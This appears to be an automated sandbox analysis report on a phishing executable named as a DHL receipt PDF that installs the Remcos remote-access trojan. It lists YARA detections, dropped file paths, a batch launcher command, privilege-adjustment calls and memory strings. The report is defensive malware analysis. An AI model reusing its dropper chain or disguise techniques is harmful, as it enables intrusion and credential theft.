Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B1884 8_2_00007FF7689B1884
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C5554 11_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BAA54 11_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C4224 11_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C0A6C 11_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C37D8 11_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DD9D0 11_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B81D4 11_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B8DF8 11_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BCE10 11_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689E1538 11_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B7D30 11_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689D7F00 11_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B6EE4 11_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B5240 11_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BD250 11_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B9E50 11_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B7650 11_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B2220 11_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B4A30 11_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DAA30 11_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BE680 11_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DEE88 11_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DAFBC 11_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B3410 11_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B6BE0 11_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B9B50 11_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B372C 11_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B3F90 11_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B5B70 11_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C18D4 11_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B8510 11_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689BB0D8 11_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C7854 11_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DAC4C 11_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B2C48 11_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B1884 11_2_00007FF7689B1884
Source: C:\Users\Public\xkn.exe Code function: 16_2_00007FFD9BAD10FA 16_2_00007FFD9BAD10FA
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF316054 19_2_00007FF6DF316054
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF311664 19_2_00007FF6DF311664
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31596C 19_2_00007FF6DF31596C
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF317C7C 19_2_00007FF6DF317C7C
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF319890 19_2_00007FF6DF319890
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF3167A0 19_2_00007FF6DF3167A0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF314050 19_2_00007FF6DF314050
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF317670 19_2_00007FF6DF317670
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF312D70 19_2_00007FF6DF312D70
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF319C74 19_2_00007FF6DF319C74
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF314318 19_2_00007FF6DF314318
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF315128 19_2_00007FF6DF315128
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF3172C0 19_2_00007FF6DF3172C0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF316EC8 19_2_00007FF6DF316EC8
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF3183D8 19_2_00007FF6DF3183D8
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF316AE8 19_2_00007FF6DF316AE8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044B040 20_2_0044B040
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0043610D 20_2_0043610D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00447310 20_2_00447310
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044A490 20_2_0044A490
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040755A 20_2_0040755A
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0043C560 20_2_0043C560
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044B610 20_2_0044B610
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044D6C0 20_2_0044D6C0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004476F0 20_2_004476F0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044B870 20_2_0044B870
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044081D 20_2_0044081D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00414957 20_2_00414957
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004079EE 20_2_004079EE
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00407AEB 20_2_00407AEB
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044AA80 20_2_0044AA80
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00412AA9 20_2_00412AA9
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404B74 20_2_00404B74
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404B03 20_2_00404B03
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0044BBD8 20_2_0044BBD8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404BE5 20_2_00404BE5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00404C76 20_2_00404C76
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00415CFE 20_2_00415CFE
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00416D72 20_2_00416D72
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00446D30 20_2_00446D30
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00446D8B 20_2_00446D8B
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00406E8F 20_2_00406E8F
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\yfkwifxL.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA42093 appears 50 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028B7CC8 appears 49 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A480C appears 865 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A6650 appears 37 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA41E65 appears 35 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028B7E14 appears 45 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A46A4 appears 242 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA74E10 appears 54 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA74770 appears 41 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A44AC appears 69 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF7689C3448 appears 54 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028E6650 appears 37 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 004169A7 appears 87 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 2D5D4E10 appears 54 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 004165FF appears 35 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028E46A4 appears 152 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028E480C appears 606 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028F7CC8 appears 43 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 00416760 appears 69 times
Source: C:\Users\Public\ger.exe Code function: String function: 00007FF6DF31D3D0 appears 56 times
Sample file is different than original file name gathered from version info
Source: DHL119040 receipt document,pdf.exe Binary or memory string: OriginalFilename vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Uses 32bit PE files
Source: DHL119040 receipt document,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Yara signature match
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@69/31@6/5
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError, 7_2_00007FF7689B32B0
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA57952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_2DA57952
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B7952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 5_2_2D5B7952
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF313F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 19_2_00007FF6DF313F5C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A7F6A GetDiskFreeSpaceA, 0_2_028A7F6A
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4F8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 0_2_2DA4F8FD
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B6D60 CoCreateInstance, 0_2_028B6D60
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 0_2_2DA5B4A8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5AC78
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\Public\xkn.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\ProgramData\Remcos\remcos.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: C:\Users\Public\Libraries\yfkwifxL.pif File created: C:\Users\user\AppData\Local\Temp\971D.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Remcos\remcos.exe System information queried: HandleInformation
Source: C:\Windows\System32\extrac32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000015.00000002.1816729060.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: remcos.exe, 00000014.00000002.1859873627.000000000270A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: DHL119040 receipt document,pdf.exe Virustotal: Detection: 18%
Source: DHL119040 receipt document,pdf.exe String found in binary or memory: -StartForward
Source: DHL119040 receipt document,pdf.exe String found in binary or memory: -address family not supported
Source: remcos.exe String found in binary or memory: _-address family not supported
